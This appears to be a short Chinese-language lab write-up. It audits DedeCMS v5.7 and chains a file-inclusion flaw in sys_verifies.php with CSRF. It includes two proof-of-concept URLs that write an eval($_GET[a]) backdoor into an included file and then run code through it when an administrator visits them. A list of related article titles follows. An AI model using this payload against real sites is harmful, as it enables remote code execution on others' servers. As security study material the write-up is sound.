DedeCMS v5.7 通過檔案包含和CSRF的配合利用
該靶場使用了 DedeCMS v5.7 ,所以將其原始碼下載,進行程式碼審計。
檔案包含漏洞出現在 /dede/sys_verifies.php 檔案中,來看程式碼:
如上圖,當請求引數action的值為"getfiles"時,程式會在 /data 目錄下生成檔案 modifytmp.inc 並寫入內容,而寫入的內容是我們可以控制的,可通過新增GET請求引數refiles來控制。
要想利用這個 modifytmp.inc 檔案,還得在程式碼中找一處包含該檔案的地方。而同一原始碼檔案的下面就有,如下圖:
於是,便可以構造poc 如下:
http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_GET[a]);die();//
http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?action=down&a=phpinfo();
然後管理員先訪問第一個連結,然後訪問第二個連結,結果如下:
PS:因為 sys_verifies.php 的程式碼中,會有許可權檢查,如果不是管理員的話是不能執行下面的程式碼的,會直接返回登入頁面或者提示沒有許可權。
相關文章
- 檔案包含漏洞(本地包含配合檔案上傳)
- 利用pearcmd實現裸檔案包含
- DeDeCMS v5.7 密碼修改漏洞分析密碼
- PHP檔案包含漏洞(利用phpinfo)復現PHP
- 檔案包含漏洞(繞過姿勢)
- PHP本地檔案包含漏洞環境搭建與利用PHP
- dedecms主要類檔案
- 解決ajax傳送Formdata資料包含檔案和text資料,spring後臺無法通過MultipartFile拿到檔案ORMSpring
- DVWA檔案包含全等級繞過方法
- 檔案包含之包含了Linux檔案描述符Linux
- 檔案包含2
- CTFer——檔案包含
- Shell 檔案包含
- 什麼是檔案包含漏洞?檔案包含漏洞分類!
- 檔案的複製通過字元流和緩衝流(Buffered)字元
- PHP檔案包含 整理PHP
- 通過配置檔案(.htaccess)實現檔案上傳
- springCloud 微服務通過minio實現檔案上傳和檔案下載介面SpringGCCloud微服務
- SpringBoot通過yml和xml檔案配置日誌輸出Spring BootXML
- 前端通過 post 下載檔案前端
- 遠端檔案包含shell
- PHP基礎---檔案包含PHP
- 檔案包含漏洞小結
- 本地檔案包含之包含日誌獲取webshellWebshell
- 檔案包含-基於Pikachu的學習
- 通過 hosts檔案配置本地域名
- dedecms資料庫檔案出錯的修復方法資料庫
- Laravel 和 Lumen 中通過環境變數配置對應的 env 檔案Laravel變數
- 程式碼安全之檔案包含
- 檔案包含之/proc/self/environ
- Apache Tomcat檔案包含漏洞分析ApacheTomcat
- ClickOnce釋出包含某檔案
- "白話"PHP檔案包含漏洞PHP
- PHP檔案包含小總結PHP
- css-theme 通過一套原始碼生成一份包含多套皮膚配置的樣式檔案CSS原始碼
- Python查詢包含指定字串的所有檔案Python字串
- Linux Shell檔案之間的包含關係Linux
- 通過 Git 來管理多媒體檔案Git